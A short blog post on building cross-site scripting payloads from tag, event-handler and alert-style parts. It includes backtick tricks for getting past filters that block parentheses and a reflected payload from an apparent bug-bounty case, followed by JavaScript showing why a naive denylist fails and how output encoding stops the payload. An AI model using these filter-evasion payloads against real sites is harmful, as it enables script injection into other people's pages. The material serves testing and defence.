‘Try-Harder’ for XSS

Frans Hendrik Botes
May 16 · 4 min read

Enumerating

Image from the git site.

Constructing XSS

{TAG}{EVENT}={PAYLOAD}

TAG

script
img
a
body
html
meta
xml
object
etc.

EVENT

events on(load|click|error|show) 
onclick
ondblclick
onmousedown
onmousemove
onmouseover
onmouseout
onmouseup
onkeydown
onkeypress
onkeyup
onabort
onerror
onload
onresize
onscroll
onunload
onsubmit
onblur
onchange
onfocus
onreset
onselect
onMoveOn
onauxclick
oncontextmenu
onmouseleave
ontouchcancel

Payload

write(1)
confirm(1)
alert(1)
prompt(1)
Simple variation if () is blocked. Pay attention: backticks (``) are just as effective.

write`1`
confirm`1`
alert`1`
prompt`1`
gridview=%27&’/>%20<svg/onauxClick%3D”alert`HackerOne`”</svg>=’&asd
We can see the payload reflected correctly.
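Why the payload above gets past a filter that only blocks () and a few well-known events, and what output encoding does to the same reflected value. This is an added example, not code from the original post; the `naiveDenylist` filter, the helper names and the decoded sample string are assumptions constructed for illustration.

```javascript
// Constructed sample: the reflected value from the post, URL-decoded and
// written with straight quotes.
const reflected = "'/> <svg/onauxClick=\"alert`HackerOne`\"</svg>";

// Hypothetical denylist of the kind the variations above work around:
// it rejects parentheses and a short list of common handlers.
function naiveDenylist(value) {
  const blocked = /[()]|on(load|click|error|mouseover)\s*=/i;
  return !blocked.test(value); // true means the filter lets the value through
}

// Structural signal for logging: any on<name>= attribute, whatever the event
// is called. Coarse by design, so treat a hit as something to review.
function hasEventHandlerAttribute(value) {
  return /[\s\/"'<]on[a-z]+\s*=/i.test(value);
}

// Output encoding for HTML element and quoted-attribute contexts. The
// backtick is included because it is the character the () variation relies on.
const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;",
  '"': "&quot;", "'": "&#x27;", "`": "&#x60;",
};
function encodeForHtml(value) {
  return String(value).replace(/[&<>"'`]/g, (ch) => HTML_ESCAPES[ch]);
}

// A value can only close the attribute or open a new tag if one of these
// characters reaches the page unencoded.
function canBreakOutOfAttribute(value) {
  return /[<>"'`]/.test(value);
}

const encoded = encodeForHtml(reflected);
console.log("denylist lets it through:", naiveDenylist(reflected));
console.log("handler attribute seen:  ", hasEventHandlerAttribute(reflected));
console.log("encoded for output:      ", encoded);
console.log("can still break out:     ", canBreakOutOfAttribute(encoded));
```

The denylist passes the value because neither `onauxclick` nor the backtick call is on its list, while the encoded form contains no character that can close the attribute or start a tag.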

Written by Frans Hendrik Botes (OSCP, CISM, CISA, CRISC)
